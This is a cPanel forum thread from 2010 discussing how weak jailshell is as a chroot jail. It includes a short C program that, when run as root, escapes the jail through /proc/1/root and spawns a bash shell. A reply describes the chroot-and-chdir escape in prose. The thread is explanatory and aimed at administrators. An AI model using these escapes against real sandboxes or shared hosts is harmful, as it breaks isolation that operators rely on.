The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

jailshell: get out of jail free

Discussion in 'Security' started by tylerl, Nov 4, 2010.

  1. tylerl

    tylerl Active Member

    Joined:
    Dec 11, 2009
    Messages:
    28
    Likes Received:
    0
    Trophy Points:
    1
    This isn't new, nor is it news.

    I recently needed to give jailshell'ed users access to specific root functionality outside the chroot jail on a specific server. The mechanism for breaking out of jail is so trivial that I figured I'd post it here for two reasons.

    First, if you need to be able to grant out-of-jail access on specific setuid-root binaries for jailshell users, here's the solution. And second, if you're considering using jailshell for security reasons, you ought to know how very little protection it actually offers. Also, it's worth pointing out again, there's little sense in creating a chroot jail if you're going to mount proc inside it (therefore providing a route back out).

    The following code, if run as root or as a setuid-root binary, will spawn a regular bash shell outside the jail environment.

    Code:
    #include <unistd.h>
    #include <stdio.h>
    #include <malloc.h>
    
    int main(int argc, char* argv[])
    {
    	// clear UID restrictions
    	setreuid(0,0);
    	setregid(0,0);
    	
    	// jailbreak
    	chroot("/proc/1/root");
    
    	// exec bash
    	char **argv_out = malloc(sizeof(char*)*2);
    	argv_out[0] = "/bin/bash";
    	argv_out[1] = 0;
    	execvp(argv_out[0], argv_out);
    
    	// fail
    	perror("Unable to execute command");
    	return 1;
    }
    
     
  2. cPanelKenneth

    cPanelKenneth cPanel Development
    Staff Member

    Joined:
    Apr 7, 2006
    Messages:
    4,458
    Likes Received:
    22
    Trophy Points:
    38
    cPanel Access Level:
    Root Administrator
    A chroot jail is not a security mechanism.

    If you grant someone root capabilities, don't be surprised when they use the privileges in an unintended way.
     
  3. JeffP.

    JeffP. Well-Known Member

    Joined:
    Sep 28, 2010
    Messages:
    164
    Likes Received:
    9
    Trophy Points:
    18
    Additionally, /proc access isn't required. If you get root in a jailed env, you can just chroot somedir, then chdir .. a few times, chroot ., and exec a shell from there. There are protections against this type of thing, but I just wanted to note that /proc isn't really the deciding factor in breaking out of a jailed env or not.
     
Loading...

Share This Page